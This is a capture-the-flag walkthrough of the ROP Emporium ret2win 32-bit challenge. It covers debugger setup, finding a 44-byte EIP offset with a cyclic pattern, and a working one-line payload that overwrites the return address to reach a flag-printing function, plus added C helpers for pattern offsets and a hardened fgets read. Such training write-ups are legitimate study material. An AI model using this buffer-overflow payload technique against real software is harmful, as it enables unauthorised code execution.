Ropemporium Ret2win Writeup

Before you proceed any further, make sure you have all the requirements fulfilled.

ASM knowledge
Debugger familiarity
GDB
Basic ROP knowledge
Brain

Setup
In this post, we will try to learn ROP (Return Oriented Programming) using the ROP Emporium ret2win 32-bit binary. Let's set up our machine for debugging by installing PEDA and downloading the target binary.

[email protected]:~/Desktop# cd ~/
[email protected]:~# git clone https://github.com/longld/peda
Cloning into 'peda'...
remote: Counting objects: 324, done.
remote: Total 324 (delta 0), reused 0 (delta 0), pack-reused 324
Receiving objects: 100% (324/324), 243.64 KiB | 111.00 KiB/s, done.
Resolving deltas: 100% (206/206), done.
[email protected]:~# echo "source ~/peda/peda.py" > .gdbinit
[email protected]:~# cd Desktop/
[email protected]:~/Desktop# mkdir ropemporium
[email protected]:~/Desktop# cd ropemporium/
[email protected]:~/Desktop/ropemporium# mkdir ret2win
[email protected]:~/Desktop/ropemporium# cd ret2win/
[email protected]:~/Desktop/ropemporium/ret2win# wget https://ropemporium.com/binary/ret2win32.zip
--2017-09-06 07:51:50--  https://ropemporium.com/binary/ret2win32.zip
Resolving ropemporium.com (ropemporium.com)... 54.192.219.105, 54.192.219.101, 54.192.219.149, ...
Connecting to ropemporium.com (ropemporium.com)|54.192.219.105|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3374 (3.3K) [application/octet-stream]
Saving to: ‘ret2win32.zip’

ret2win32.zip                                      100%[================================================================================================================>]   3.29K  --.-KB/s    in 0s

2017-09-06 07:51:51 (25.9 MB/s) - ‘ret2win32.zip’ saved [3374/3374]

[email protected]:~/Desktop/ropemporium/ret2win# unzip ret2win32.zip
Archive:  ret2win32.zip
  inflating: ret2win32
 extracting: flag.txt
[email protected]:~/Desktop/ropemporium/ret2win#

We have downloaded and extracted the binary; time to start gdb.

Crash

[email protected]:~/Desktop/ropemporium/ret2win# python -c 'print "A" *200' > ret_payload
[email protected]:~/Desktop/ropemporium/ret2win# ./ret2win32 < ret_payload
ret2win by ROP Emporium
32bits

For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!

> Segmentation fault

[email protected]:~/Desktop/ropemporium/ret2win# gdb -q ret2win32
Reading symbols from ret2win32...(no debugging symbols found)...done.
gdb-peda$ info functions
All defined functions:

Non-debugging symbols:
0x08048400  [email protected]
0x08048410  [email protected]
0x08048420  [email protected]
0x08048430  [email protected]
............................
0x0804857b  main
0x080485f6  pwnme
0x08048659  ret2win
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
gdb-peda$ run < ret_payload

gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

gdb-peda$ run
Starting program: /root/Desktop/ropemporium/ret2win/ret2win32
ret2win by ROP Emporium
32bits
 
For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!
 
> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

We have found the offset at 44, which means that the next 4 bytes of input land in EIP. We will use a custom boilerplate to ease our exploit development for this binary, which can be found in the final exploit.
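To make the pattern step concrete, here is an added example (not part of the original writeup) that does what PEDA's `pattern offset` does over the exact 200-byte pattern above: given the 32-bit value that landed in EIP, it finds the position in the pattern it came from, and flags the value as ambiguous if it occurs more than once. The page does not show the register dump, so the value 0x41414641 ("AFAA" read little-endian) is derived from the pattern at offset 44 rather than quoted from the page.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The 200-byte cyclic pattern from the `pattern create 200` step above. */
static const char PATTERN[] =
    "AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA";

/* The 32-bit value EIP would hold if the saved return address begins
 * `off` bytes into `pattern` (x86 is little-endian, so byte 0 is the
 * least significant). Caller must ensure off + 4 <= strlen(pattern). */
uint32_t eip_at_offset(const char *pattern, size_t off)
{
    const unsigned char *p = (const unsigned char *)pattern + off;
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* The inverse, i.e. what PEDA's `pattern offset` computes: the byte
 * offset whose 4 pattern bytes equal the crashing EIP. Returns -1 if the
 * value is not in the pattern and -2 if it occurs more than once. */
long find_offset(const char *pattern, uint32_t eip)
{
    size_t len = strlen(pattern);
    long found = -1;
    for (size_t i = 0; i + 4 <= len; i++) {
        if (eip_at_offset(pattern, i) == eip) {
            if (found != -1)
                return -2;          /* ambiguous: pattern repeats */
            found = (long)i;
        }
    }
    return found;
}

int main(void)
{
    /* 0x41414641 is "AFAA": the bytes this pattern places at offset 44,
     * which is the offset the writeup reports. */
    printf("offset of 0x41414641: %ld\n", find_offset(PATTERN, 0x41414641u));
    printf("value at offset 44:   0x%08x\n", (unsigned)eip_at_offset(PATTERN, 44));
    return 0;
}
```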

Flag
This binary is pretty easy to exploit since it imports the system function and has the '/bin/cat flag.txt' string inside the data section. Let's analyze this binary in a disassembler. I will be using Hopper Disassembler for this, but you can simply type 'pdisass ret2win' inside gdb to view the same results.

We can see that the ret2win function in this binary itself pushes the address of the string '/bin/cat flag.txt' onto the stack and then calls system(), which is exactly what we need. We will simply point the overwritten return address at the start of the ret2win function (0x08048659, from the function listing above) and be done with it.

[email protected]:~/Desktop/ropemporium/ret2win# python -c "print 'A'*44 + '\x59\x86\x04\x08'" | ./ret2win32
ret2win by ROP Emporium
32bits

For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!

> Thank you! Here's your flag:ROPE{a_placeholder_32byte_flag!}
Segmentation fault

We got the flag, which is the main objective. I tried to find a way to spawn a shell but didn't find any useful ROP gadgets to do so; our input is truncated after 49 bytes, I guess, so there is only a 1-byte overwrite on the stack after our return pointer overwrite.
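The 49-byte cut-off follows from how fgets works: fgets(buf, n, stream) stores at most n-1 characters, so the binary's fgets with a limit of 50 into a 32-byte buffer (the shape its banner describes) keeps 49 bytes, 17 past the end of the buffer. The added example below (my code, not the challenge's source) measures that with a safely oversized scratch buffer and shows the hardened form of the read, where the limit comes from the buffer itself and leftover input on the line is drained; it uses a tmpfile() stand-in for stdin loaded with the 200 x 'A' crash input.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   32   /* the binary's stack buffer, per its banner */
#define VULN_LIMIT 50   /* the size argument the binary passes to fgets */

/* Constructed stand-in for stdin: the page's 200 x 'A' crash input. */
static FILE *long_line_input(void)
{
    FILE *in = tmpfile();
    char line[201];
    memset(line, 'A', 200); line[200] = '\n';
    if (in) { fwrite(line, 1, sizeof line, in); rewind(in); }
    return in;
}

/* Bytes fgets stores for a given limit: at most limit-1, so the binary's
 * fgets(buf, 50, stdin) puts 49 bytes into its 32-byte buffer, 17 past the
 * end. A 256-byte scratch keeps this measurement itself from overflowing. */
size_t bytes_stored_by_fgets(int limit)
{
    char scratch[256] = {0};
    FILE *in = long_line_input();
    if (!in || limit > (int)sizeof scratch) return 0;
    if (!fgets(scratch, limit, in)) scratch[0] = '\0';
    fclose(in);
    return strlen(scratch);
}

/* Hardened pwnme: the limit is taken from the buffer itself, and leftover
 * input on the line is drained so the next read starts clean. Returns the
 * number of bytes kept, which can never exceed BUF_SIZE - 1. */
size_t pwnme_hardened(FILE *in)
{
    char buf[BUF_SIZE];
    if (!fgets(buf, sizeof buf, in)) return 0;
    size_t n = strlen(buf);
    if (n && buf[n - 1] == '\n') buf[--n] = '\0';
    else { int c; while ((c = fgetc(in)) != EOF && c != '\n') { } }
    return n;
}

/* Run the hardened reader over the crash input: 31 bytes kept, no spill. */
size_t hardened_bytes_from_long_line(void)
{
    FILE *in = long_line_input();
    size_t n = in ? pwnme_hardened(in) : 0;
    if (in) fclose(in);
    return n;
}
```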
